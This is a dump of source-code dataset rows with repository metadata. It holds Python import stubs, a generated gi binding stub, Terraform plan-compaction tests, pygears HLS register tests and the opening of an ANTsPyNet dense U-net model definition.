| 0.038922
| false
| 0
| 0.017964
| 0
| 0.076347
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b3e5ac95b0f55b785c0c0639b63cd3b059455db9
| 94
|
py
|
Python
|
borca/parsing/__init__.py
|
AndrewSpittlemeister/borca
|
10fd89ad12fd2b846637dbed01f74508dd3bb764
|
[
"MIT"
] | 4
|
2020-01-23T23:41:44.000Z
|
2020-04-22T19:24:55.000Z
|
borca/parsing/__init__.py
|
AndrewSpittlemeister/borca
|
10fd89ad12fd2b846637dbed01f74508dd3bb764
|
[
"MIT"
] | 1
|
2020-03-11T04:40:05.000Z
|
2020-03-18T21:43:00.000Z
|
borca/parsing/__init__.py
|
AndrewSpittlemeister/borca
|
10fd89ad12fd2b846637dbed01f74508dd3bb764
|
[
"MIT"
] | null | null | null |
from borca.parsing.data_format import Task, BorcaData
from borca.parsing.parser import Parser
| 31.333333
| 53
| 0.851064
| 14
| 94
| 5.642857
| 0.642857
| 0.227848
| 0.405063
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095745
| 94
| 2
| 54
| 47
| 0.929412
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3758c8a44c80fc5a6611b80eaaaaae3f7ce34aac
| 173
|
py
|
Python
|
listener_module/steam/commands/__init__.py
|
alentoghostflame/StupidAlentoBot
|
c024bfb79a9ecb0d9fda5ddc4e361a0cb878baba
|
[
"MIT"
] | 1
|
2021-12-12T02:50:20.000Z
|
2021-12-12T02:50:20.000Z
|
listener_module/steam/commands/__init__.py
|
alentoghostflame/StupidAlentoBot
|
c024bfb79a9ecb0d9fda5ddc4e361a0cb878baba
|
[
"MIT"
] | 17
|
2020-02-07T23:40:36.000Z
|
2020-12-22T16:38:44.000Z
|
listener_module/steam/commands/__init__.py
|
alentoghostflame/StupidAlentoBot
|
c024bfb79a9ecb0d9fda5ddc4e361a0cb878baba
|
[
"MIT"
] | null | null | null |
from listener_module.steam.commands.steam_commands import steam_announcement_control
from listener_module.steam.commands.steam_announcement_task import announcement_checker
| 57.666667
| 87
| 0.919075
| 22
| 173
| 6.863636
| 0.454545
| 0.258278
| 0.238411
| 0.304636
| 0.476821
| 0.476821
| 0
| 0
| 0
| 0
| 0
| 0
| 0.046243
| 173
| 2
| 88
| 86.5
| 0.915152
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
37718f0e9825ef8c459e5caa21edf2a432892797
| 2,057
|
py
|
Python
|
pyy1/.pycharm_helpers/python_stubs/-1550516950/gi/_gi/ObjectInfo.py
|
pyy1988/pyy_test1
|
6bea878409e658aa87441384419be51aaab061e7
|
[
"Apache-2.0"
] | null | null | null |
pyy1/.pycharm_helpers/python_stubs/-1550516950/gi/_gi/ObjectInfo.py
|
pyy1988/pyy_test1
|
6bea878409e658aa87441384419be51aaab061e7
|
[
"Apache-2.0"
] | null | null | null |
pyy1/.pycharm_helpers/python_stubs/-1550516950/gi/_gi/ObjectInfo.py
|
pyy1988/pyy_test1
|
6bea878409e658aa87441384419be51aaab061e7
|
[
"Apache-2.0"
] | null | null | null |
# encoding: utf-8
# module gi._gi
# from /usr/lib/python3/dist-packages/gi/_gi.cpython-35m-x86_64-linux-gnu.so
# by generator 1.145
# no doc
# imports
import _gobject as _gobject # <module '_gobject'>
import _glib as _glib # <module '_glib'>
import gi as __gi
import gobject as __gobject
class ObjectInfo(__gi.RegisteredTypeInfo):
# no doc
def find_method(self, *args, **kwargs): # real signature unknown
pass
def find_vfunc(self, *args, **kwargs): # real signature unknown
pass
def get_abstract(self, *args, **kwargs): # real signature unknown
pass
def get_class_struct(self, *args, **kwargs): # real signature unknown
pass
def get_constants(self, *args, **kwargs): # real signature unknown
pass
def get_fields(self, *args, **kwargs): # real signature unknown
pass
def get_fundamental(self, *args, **kwargs): # real signature unknown
pass
def get_get_value_function(self, *args, **kwargs): # real signature unknown
pass
def get_interfaces(self, *args, **kwargs): # real signature unknown
pass
def get_methods(self, *args, **kwargs): # real signature unknown
pass
def get_parent(self, *args, **kwargs): # real signature unknown
pass
def get_properties(self, *args, **kwargs): # real signature unknown
pass
def get_ref_function(self, *args, **kwargs): # real signature unknown
pass
def get_set_value_function(self, *args, **kwargs): # real signature unknown
pass
def get_signals(self, *args, **kwargs): # real signature unknown
pass
def get_type_init(self, *args, **kwargs): # real signature unknown
pass
def get_type_name(self, *args, **kwargs): # real signature unknown
pass
def get_unref_function(self, *args, **kwargs): # real signature unknown
pass
def get_vfuncs(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
| 26.714286
| 79
| 0.654351
| 262
| 2,057
| 4.958015
| 0.240458
| 0.123172
| 0.21555
| 0.277136
| 0.712856
| 0.712856
| 0.712856
| 0.712856
| 0.614319
| 0.241724
| 0
| 0.007673
| 0.239669
| 2,057
| 76
| 80
| 27.065789
| 0.82289
| 0.312105
| 0
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.444444
| false
| 0.444444
| 0.088889
| 0
| 0.555556
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 8
|
807fc8480dcc08c9859b3269e772f86ca23ed5a6
| 149
|
py
|
Python
|
build_depsjs.py
|
ludios/Coreweb
|
735f2636553ff8bb08b86cc0687f5e8b7c484035
|
[
"BSD-3-Clause"
] | null | null | null |
build_depsjs.py
|
ludios/Coreweb
|
735f2636553ff8bb08b86cc0687f5e8b7c484035
|
[
"BSD-3-Clause"
] | null | null | null |
build_depsjs.py
|
ludios/Coreweb
|
735f2636553ff8bb08b86cc0687f5e8b7c484035
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
from coreweb._closurebuild.depsjs import write_depsjs
write_depsjs(['js_coreweb ../../../js_coreweb'], "js_coreweb/deps.js")
| 24.833333
| 70
| 0.744966
| 21
| 149
| 5
| 0.571429
| 0.257143
| 0.209524
| 0.342857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.073826
| 149
| 5
| 71
| 29.8
| 0.76087
| 0.134228
| 0
| 0
| 0
| 0
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
809326aecc580d61f81e931b5b2da331cac35df5
| 9,084
|
py
|
Python
|
terraform/executor/test_compact_plan.py
|
kelveden/circleci-orbs
|
8e1067afcffbfb0bb46feb245207b1324b5290c0
|
[
"MIT"
] | 44
|
2018-12-19T16:50:38.000Z
|
2022-03-21T11:30:46.000Z
|
terraform/executor/test_compact_plan.py
|
kelveden/circleci-orbs
|
8e1067afcffbfb0bb46feb245207b1324b5290c0
|
[
"MIT"
] | 114
|
2018-12-06T13:34:51.000Z
|
2022-02-28T15:03:38.000Z
|
terraform/executor/test_compact_plan.py
|
kelveden/circleci-orbs
|
8e1067afcffbfb0bb46feb245207b1324b5290c0
|
[
"MIT"
] | 53
|
2019-02-04T12:20:12.000Z
|
2022-03-16T17:17:29.000Z
|
from compact_plan import compact_plan
def test_plan_11():
input = """Refreshing Terraform state in-memory prior to plan...
The refreshed state will be used to calculate this plan, but will not be
persisted to local or remote state storage.
------------------------------------------------------------------------
An execution plan has been generated and is shown below.
Resource actions are indicated with the following symbols:
+ create
Terraform will perform the following actions:
+ random_string.my_string
id: <computed>
length: "11"
lower: "true"
min_lower: "0"
min_numeric: "0"
min_special: "0"
min_upper: "0"
number: "true"
result: <computed>
special: "true"
upper: "true"
Plan: 1 to add, 0 to change, 0 to destroy.
"""
expected_output = """An execution plan has been generated and is shown below.
Resource actions are indicated with the following symbols:
+ create
Terraform will perform the following actions:
+ random_string.my_string
id: <computed>
length: "11"
lower: "true"
min_lower: "0"
min_numeric: "0"
min_special: "0"
min_upper: "0"
number: "true"
result: <computed>
special: "true"
upper: "true"
Plan: 1 to add, 0 to change, 0 to destroy."""
output = '\n'.join(compact_plan(input.splitlines()))
assert output == expected_output
def test_plan_12():
input = """Refreshing Terraform state in-memory prior to plan...
The refreshed state will be used to calculate this plan, but will not be
persisted to local or remote state storage.
------------------------------------------------------------------------
An execution plan has been generated and is shown below.
Resource actions are indicated with the following symbols:
+ create
Terraform will perform the following actions:
# random_string.my_string will be created
+ resource "random_string" "my_string" {
+ id = (known after apply)
+ length = 11
+ lower = true
+ min_lower = 0
+ min_numeric = 0
+ min_special = 0
+ min_upper = 0
+ number = true
+ result = (known after apply)
+ special = true
+ upper = true
}
Plan: 1 to add, 0 to change, 0 to destroy.
"""
expected_output = """An execution plan has been generated and is shown below.
Resource actions are indicated with the following symbols:
+ create
Terraform will perform the following actions:
# random_string.my_string will be created
+ resource "random_string" "my_string" {
+ id = (known after apply)
+ length = 11
+ lower = true
+ min_lower = 0
+ min_numeric = 0
+ min_special = 0
+ min_upper = 0
+ number = true
+ result = (known after apply)
+ special = true
+ upper = true
}
Plan: 1 to add, 0 to change, 0 to destroy."""
output = '\n'.join(compact_plan(input.splitlines()))
assert output == expected_output
def test_plan_14():
input = """
An execution plan has been generated and is shown below.
Resource actions are indicated with the following symbols:
+ create
Terraform will perform the following actions:
# random_string.my_string will be created
+ resource "random_string" "my_string" {
+ id = (known after apply)
+ length = 11
+ lower = true
+ min_lower = 0
+ min_numeric = 0
+ min_special = 0
+ min_upper = 0
+ number = true
+ result = (known after apply)
+ special = true
+ upper = true
}
Plan: 1 to add, 0 to change, 0 to destroy.
Changes to Outputs:
+ s = "string"
"""
expected_output = """An execution plan has been generated and is shown below.
Resource actions are indicated with the following symbols:
+ create
Terraform will perform the following actions:
# random_string.my_string will be created
+ resource "random_string" "my_string" {
+ id = (known after apply)
+ length = 11
+ lower = true
+ min_lower = 0
+ min_numeric = 0
+ min_special = 0
+ min_upper = 0
+ number = true
+ result = (known after apply)
+ special = true
+ upper = true
}
Plan: 1 to add, 0 to change, 0 to destroy.
Changes to Outputs:
+ s = "string\""""
output = '\n'.join(compact_plan(input.splitlines()))
assert output == expected_output
def test_error_11():
input = """
Error: random_string.my_string: length: cannot parse '' as int: strconv.ParseInt: parsing "ten": invalid syntax
"""
expected_output = """Error: random_string.my_string: length: cannot parse '' as int: strconv.ParseInt: parsing "ten": invalid syntax
"""
output = '\n'.join(compact_plan(input.splitlines()))
assert output == expected_output
def test_error_12():
input = """
Error: Incorrect attribute value type
on main.tf line 2, in resource "random_string" "my_string":
2: length = "ten"
Inappropriate value for attribute "length": a number is required.
"""
expected_output = """Error: Incorrect attribute value type
on main.tf line 2, in resource "random_string" "my_string":
2: length = "ten"
Inappropriate value for attribute "length": a number is required."""
output = '\n'.join(compact_plan(input.splitlines()))
assert output == expected_output
def test_no_change_11():
input = """Refreshing Terraform state in-memory prior to plan...
The refreshed state will be used to calculate this plan, but will not be
persisted to local or remote state storage.
------------------------------------------------------------------------
No changes. Infrastructure is up-to-date.
This means that Terraform did not detect any differences between your
configuration and real physical resources that exist. As a result, no
actions need to be performed.
"""
expected_output = """No changes. Infrastructure is up-to-date.
This means that Terraform did not detect any differences between your
configuration and real physical resources that exist. As a result, no
actions need to be performed."""
output = '\n'.join(compact_plan(input.splitlines()))
assert output == expected_output
def test_no_change_14():
input = """
No changes. Infrastructure is up-to-date.
This means that Terraform did not detect any differences between your
configuration and real physical resources that exist. As a result, no
actions need to be performed.
"""
expected_output = """No changes. Infrastructure is up-to-date.
This means that Terraform did not detect any differences between your
configuration and real physical resources that exist. As a result, no
actions need to be performed."""
output = '\n'.join(compact_plan(input.splitlines()))
assert output == expected_output
def test_no_output():
input = """
This is not anything like terraform output we know. We want this to be output unchanged.
This should protect against the output changing again.
"""
expected_output = """
This is not anything like terraform output we know. We want this to be output unchanged.
This should protect against the output changing again."""
output = '\n'.join(compact_plan(input.splitlines()))
assert output == expected_output
def test_plan_1_0():
input_one = """
STATE_REFRESH_1
STATE_REFRESH_2
Terraform used the selected providers to generate the following execution
plan. Resource actions are indicated with the following symbols:
+ create
Terraform will perform the following actions:
# random_string.my_string will be created
+ random_string.my_string
+ id: <computed>
+ length: "11"
+ lower: "true"
+ min_lower: "0"
+ min_numeric: "0"
+ min_special: "0"
+ min_upper: "0"
+ number: "true"
+ result: <computed>
+ special: "true"
+ upper: "true"
Plan: 1 to add, 0 to change, 0 to destroy."""
input_two = """
STATE_REFRESH_2
STATE_REFRESH_1
Terraform used the selected providers to generate the following execution
plan. Resource actions are indicated with the following symbols:
+ create
Terraform will perform the following actions:
# random_string.my_string will be created
+ random_string.my_string
+ id: <computed>
+ length: "11"
+ lower: "true"
+ min_lower: "0"
+ min_numeric: "0"
+ min_special: "0"
+ min_upper: "0"
+ number: "true"
+ result: <computed>
+ special: "true"
+ upper: "true"
Plan: 1 to add, 0 to change, 0 to destroy."""
clipped_output_one = list(compact_plan(input_one.splitlines()))
clipped_output_two = list(compact_plan(input_two.splitlines()))
assert clipped_output_one == clipped_output_two
assert len(clipped_output_one) > 0
| 28.566038
| 136
| 0.633311
| 1,157
| 9,084
| 4.852204
| 0.12446
| 0.0171
| 0.044888
| 0.064125
| 0.936231
| 0.936231
| 0.936231
| 0.936231
| 0.936231
| 0.936231
| 0
| 0.014383
| 0.257596
| 9,084
| 317
| 137
| 28.656151
| 0.818061
| 0
| 0
| 0.872428
| 0
| 0
| 0.817812
| 0.054381
| 0
| 0
| 0
| 0
| 0.041152
| 1
| 0.037037
| false
| 0
| 0.004115
| 0
| 0.041152
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
03b93c8be29c5ea9ef23d76994bb6d35e666d666
| 145
|
py
|
Python
|
03 Operators and Operands/assignmentoperators.py
|
Himanshu44626748/Learn-Python
|
f3a4d997f2d29b146e5f7434f4801ae94bc3483f
|
[
"MIT"
] | 2
|
2020-03-16T14:57:44.000Z
|
2020-11-29T07:45:54.000Z
|
03 Operators and Operands/assignmentoperators.py
|
Himanshu44626748/Learn-Python
|
f3a4d997f2d29b146e5f7434f4801ae94bc3483f
|
[
"MIT"
] | null | null | null |
03 Operators and Operands/assignmentoperators.py
|
Himanshu44626748/Learn-Python
|
f3a4d997f2d29b146e5f7434f4801ae94bc3483f
|
[
"MIT"
] | 1
|
2020-08-13T07:59:02.000Z
|
2020-08-13T07:59:02.000Z
|
a=b=c=10
print(a,b,c)
x,y = 5,2
x+=y
print(x)
x-=y
print(x)
x*=y
print(x)
x/=y
print(x)
x%=y
print(x)
x+=6
x**=y
print(x)
x//=y
print(x)
| 5.37037
| 12
| 0.517241
| 42
| 145
| 1.785714
| 0.238095
| 0.213333
| 0.653333
| 0.746667
| 0.76
| 0.76
| 0.76
| 0.76
| 0.546667
| 0.546667
| 0
| 0.042735
| 0.193103
| 145
| 26
| 13
| 5.576923
| 0.598291
| 0
| 0
| 0.388889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.444444
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
03e77609ddaeb6c6961c70709f7d4f6db4ba7c93
| 117
|
py
|
Python
|
python/testData/formatter/multilineElifConditionInParentheses_after.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/formatter/multilineElifConditionInParentheses_after.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/formatter/multilineElifConditionInParentheses_after.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
if (foo and
bar == 42):
pass
elif (foo and
bar):
pass
elif (foo and
bar == 24):
pass
| 11.7
| 19
| 0.452991
| 17
| 117
| 3.117647
| 0.470588
| 0.339623
| 0.509434
| 0.528302
| 0.641509
| 0
| 0
| 0
| 0
| 0
| 0
| 0.060606
| 0.435897
| 117
| 9
| 20
| 13
| 0.742424
| 0
| 0
| 0.555556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
2062db296873f3653e04cfe877680b09e13a9b7e
| 2,038
|
py
|
Python
|
tests/hls/test_reg.py
|
bogdanvuk/pygears
|
a0b21d445e1d5c89ad66751447b8253536b835ee
|
[
"MIT"
] | 120
|
2018-04-23T08:29:04.000Z
|
2022-03-30T14:41:52.000Z
|
tests/hls/test_reg.py
|
FZP1607152286/pygears
|
a0b21d445e1d5c89ad66751447b8253536b835ee
|
[
"MIT"
] | 12
|
2019-07-09T17:12:58.000Z
|
2022-03-18T09:05:10.000Z
|
tests/hls/test_reg.py
|
FZP1607152286/pygears
|
a0b21d445e1d5c89ad66751447b8253536b835ee
|
[
"MIT"
] | 12
|
2019-05-10T19:42:08.000Z
|
2022-03-28T18:26:44.000Z
|
from pygears import gear, Intf, find
from pygears.typing import Queue, Uint
from pygears.hls.translate import translate_gear
def test_update_after_in_loop():
@gear(hdl={'compile': True})
async def test(din: Queue[Uint]) -> b'din':
acc = din.dtype.data(0)
async for d, eot in din:
acc = d + acc
if eot:
yield acc, eot
test(Intf(Queue[Uint[8]]))
ctx, res = translate_gear(find('/test'))
assert ctx.scope['acc'].reg
# Value for 'acc' is set a new every loop, so it isn't a register
def test_update_after_in_loop_ifelse_trap():
@gear(hdl={'compile': True})
async def test(din: Queue[Uint]) -> b'din':
acc = din.dtype.data(0)
async for d, eot in din:
if d > 0:
acc = 1
else:
acc = 0
acc = d + acc
if eot:
yield acc, eot
test(Intf(Queue[Uint[8]]))
ctx, res = translate_gear(find('/test'))
assert not ctx.scope['acc'].reg
# Value for 'acc' is set only conditionaly at the beggining of the loop, so it
# has to be a register
def test_update_after_in_loop_if_trap():
@gear(hdl={'compile': True})
async def test(din: Queue[Uint]) -> b'din':
acc = din.dtype.data(0)
async for d, eot in din:
if d > 0:
acc = 1
acc = d + acc
if eot:
yield acc, eot
test(Intf(Queue[Uint[8]]))
ctx, res = translate_gear(find('/test'))
assert ctx.scope['acc'].reg
def test_update_after_in_loop_ifelif():
    # if/elif without a final 'else' is still a conditional assignment: when
    # neither branch is taken, 'acc' carries over from the previous iteration,
    # so it must be inferred as a register.
    @gear(hdl={'compile': True})
    async def test(din: Queue[Uint]) -> b'din':
        acc = din.dtype.data(0)
        async for d, eot in din:
            if d > 0:
                acc = 1
            elif d < 2:
                acc = 0
            acc = d + acc
            if eot:
                yield acc, eot
    test(Intf(Queue[Uint[8]]))
    ctx, res = translate_gear(find('/test'))
    # Not all paths assign 'acc' -> register.
    assert ctx.scope['acc'].reg
| 22.395604
| 78
| 0.530422
| 295
| 2,038
| 3.576271
| 0.223729
| 0.076777
| 0.049289
| 0.068246
| 0.809479
| 0.809479
| 0.763981
| 0.763981
| 0.701422
| 0.65782
| 0
| 0.012734
| 0.344946
| 2,038
| 90
| 79
| 22.644444
| 0.777528
| 0.078999
| 0
| 0.824561
| 0
| 0
| 0.038441
| 0
| 0
| 0
| 0
| 0
| 0.070175
| 1
| 0.070175
| false
| 0
| 0.052632
| 0
| 0.122807
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
20b312eb86622d6061e613dbf8490b6f0be77c84
| 19,534
|
py
|
Python
|
ext/ANTsPyNet/antspynet/architectures/create_denseunet_model.py
|
tsmonteiro/fmri_proc
|
ee740cfa3c3a7ef8e1ee1ebd3b286a66712e0ec1
|
[
"MIT"
] | 2
|
2021-11-16T10:00:33.000Z
|
2021-12-13T02:57:40.000Z
|
ext/ANTsPyNet/antspynet/architectures/create_denseunet_model.py
|
tsmonteiro/fmri_proc
|
ee740cfa3c3a7ef8e1ee1ebd3b286a66712e0ec1
|
[
"MIT"
] | null | null | null |
ext/ANTsPyNet/antspynet/architectures/create_denseunet_model.py
|
tsmonteiro/fmri_proc
|
ee740cfa3c3a7ef8e1ee1ebd3b286a66712e0ec1
|
[
"MIT"
] | 1
|
2021-12-13T02:57:27.000Z
|
2021-12-13T02:57:27.000Z
|
import tensorflow as tf
import tensorflow.keras.backend as K
from tensorflow.keras.models import Model
from tensorflow.keras.layers import (Input, Dropout, BatchNormalization, Add,
Concatenate, Dense, Activation,
Conv2D, Conv2DTranspose, AveragePooling2D,
MaxPooling2D, UpSampling2D, ZeroPadding2D,
Conv3D, Conv3DTranspose, AveragePooling3D,
MaxPooling3D, UpSampling3D, ZeroPadding3D)
from tensorflow.keras import initializers
from tensorflow.keras import regularizers
from ..utilities import Scale
def create_denseunet_model_2d(input_image_size,
                              number_of_outputs=1,
                              number_of_layers_per_dense_block=(6, 12, 36, 24),
                              growth_rate=48,
                              initial_number_of_filters=96,
                              reduction_rate=0.0,
                              depth=7,
                              dropout_rate=0.0,
                              weight_decay=1e-4,
                              mode='classification'
                              ):
    """
    2-D implementation of the dense U-net deep learning architecture.

    Creates a keras model of the dense U-net deep learning architecture for
    image segmentation

    X. Li, H. Chen, X. Qi, Q. Dou, C.-W. Fu, P.-A. Heng. H-DenseUNet: Hybrid
    Densely Connected UNet for Liver and Tumor Segmentation from CT Volumes

    available here:

            https://arxiv.org/pdf/1709.07330.pdf

    with the author's implementation available at:

            https://github.com/xmengli999/H-DenseUNet

    Arguments
    ---------
    input_image_size : tuple of length 3
        Used for specifying the input tensor shape.  The
        shape (or dimension) of that tensor is the image dimensions followed by
        the number of channels (e.g., red, green, and blue).  The batch size
        (i.e., number of training images) is not specified a priori.

    number_of_outputs : integer
        Meaning depends on the mode.  For 'classification' this is the number of
        segmentation labels.  For 'regression' this is the number of outputs.

    number_of_layers_per_dense_blocks : tuple
        Number of dense blocks per layer.

    growth_rate : integer
        Number of filters to add for each dense block layer (default = 48).

    initial_number_of_filters : integer
        Number of filters at the beginning (default = 96).

    reduction_rate : scalar
        Reduction factor of transition blocks.

    depth : integer
        Number of layers---must be equal to 3 * N + 4 where N is an integer
        (default = 7).

    dropout_rate : scalar
        Float between 0 and 1 to use between dense layers.

    weight_decay : scalar
        Weighting parameter for L2 regularization of the kernel weights of the
        convolution layers (default = 1e-4).

    mode : string
        'classification' (softmax final activation) or 'regression' (linear
        final activation).

    Returns
    -------
    Keras model
        A 2-D Keras model defining the network.

    Example
    -------
    >>> model = create_denseunet_model_2d((128, 128, 1))
    >>> model.summary()
    """

    # Dense blocks concatenate feature maps along the channel axis, whose
    # position depends on the backend image data format.
    concatenation_axis = 1
    if K.image_data_format() == 'channels_last':
        concatenation_axis = -1

    def convolution_factory_2d(model, number_of_filters,
                               kernel_size=(3, 3),
                               dropout_rate=0.0, weight_decay=1e-4):
        # BN -> Scale -> ReLU -> 1x1 "bottleneck" conv (4x filters),
        # then BN -> Scale -> ReLU -> padded kxk conv.
        model = BatchNormalization(axis=concatenation_axis)(model)
        model = Scale(axis=concatenation_axis)(model)
        model = Activation('relu')(model)
        model = Conv2D(filters=(number_of_filters * 4),
                       kernel_size=(1, 1),
                       use_bias=False)(model)
        if dropout_rate > 0.0:
            model = Dropout(rate=dropout_rate)(model)
        # Convolution layer
        model = BatchNormalization(axis=concatenation_axis,
                                   epsilon=1.1e-5)(model)
        model = Scale(axis=concatenation_axis)(model)
        model = Activation(activation='relu')(model)
        model = ZeroPadding2D(padding=(1, 1))(model)
        model = Conv2D(filters=number_of_filters,
                       kernel_size=kernel_size,
                       use_bias=False)(model)
        if dropout_rate > 0.0:
            model = Dropout(rate=dropout_rate)(model)
        return model

    def transition_2d(model, number_of_filters, compression_rate=1.0,
                      dropout_rate=0.0, weight_decay=1e-4):
        # Transition block: 1x1 conv with channel compression followed by
        # 2x2 average pooling (spatial downsampling).
        model = BatchNormalization(axis=concatenation_axis,
                                   gamma_regularizer=regularizers.l2(weight_decay),
                                   beta_regularizer=regularizers.l2(weight_decay))(model)
        model = Scale(axis=concatenation_axis)(model)
        model = Activation(activation='relu')(model)
        model = Conv2D(filters=int(number_of_filters * compression_rate),
                       kernel_size=(1, 1),
                       use_bias=False)(model)
        if dropout_rate > 0.0:
            model = Dropout(rate=dropout_rate)(model)
        model = AveragePooling2D(pool_size=(2, 2),
                                 strides=(2, 2))(model)
        return model

    def create_dense_blocks_2d(model, number_of_filters, depth, growth_rate,
                               dropout_rate=0.0, weight_decay=1e-4):
        # Each layer's output is concatenated with all previous layers'
        # outputs (dense connectivity); channels grow by growth_rate per layer.
        dense_block_layers = [model]
        for i in range(depth):
            model = convolution_factory_2d(model, number_of_filters=growth_rate,
                                           kernel_size=(3, 3),
                                           dropout_rate=dropout_rate,
                                           weight_decay=weight_decay)
            dense_block_layers.append(model)
            model = Concatenate(axis=concatenation_axis)(dense_block_layers)
            number_of_filters += growth_rate
        return model, number_of_filters

    if ((depth - 4) % 3) != 0:
        raise ValueError('Depth must be equal to 3*N+4 where N is an integer.')
    # N in depth = 3 * N + 4.  (Fixed: the original computed '(depth - 4) % 3',
    # which is always 0 after the check above; integer division is intended.)
    number_of_layers = (depth - 4) // 3

    number_of_dense_blocks = len(number_of_layers_per_dense_block)

    inputs = Input(shape=input_image_size)

    # Encoder outputs saved for the decoder's skip connections.
    box_layers = []
    box_count = 1

    # Initial convolution
    outputs = ZeroPadding2D(padding=(3, 3))(inputs)
    outputs = Conv2D(filters=initial_number_of_filters,
                     kernel_size=(7, 7),
                     strides=(2, 2),
                     use_bias=False)(outputs)
    outputs = BatchNormalization(epsilon=1.1e-5,
                                 axis=concatenation_axis)(outputs)
    outputs = Scale(axis=concatenation_axis)(outputs)
    outputs = Activation(activation='relu')(outputs)

    box_layers.append(outputs)
    box_count += 1

    outputs = ZeroPadding2D(padding=(1, 1))(outputs)
    outputs = MaxPooling2D(pool_size=(3, 3),
                           strides=(2, 2))(outputs)

    # Add dense blocks (all but the last are followed by a transition block).
    nFilters = initial_number_of_filters
    for i in range(number_of_dense_blocks - 1):
        outputs, number_of_filters = \
            create_dense_blocks_2d(outputs, number_of_filters=nFilters,
                                   depth=number_of_layers_per_dense_block[i],
                                   growth_rate=growth_rate,
                                   dropout_rate=dropout_rate,
                                   weight_decay=weight_decay)

        box_layers.append(outputs)
        box_count += 1

        outputs = transition_2d(outputs, number_of_filters=number_of_filters,
                                compression_rate=(1.0 - reduction_rate),
                                dropout_rate=dropout_rate,
                                weight_decay=weight_decay)
        nFilters = int(number_of_filters * (1 - reduction_rate))

    # Final dense block (no trailing transition).
    outputs, nFilters = \
        create_dense_blocks_2d(outputs, number_of_filters=nFilters,
                               depth=number_of_layers_per_dense_block[number_of_dense_blocks - 1],
                               growth_rate=growth_rate,
                               dropout_rate=dropout_rate,
                               weight_decay=weight_decay)

    outputs = BatchNormalization(epsilon=1.1e-5,
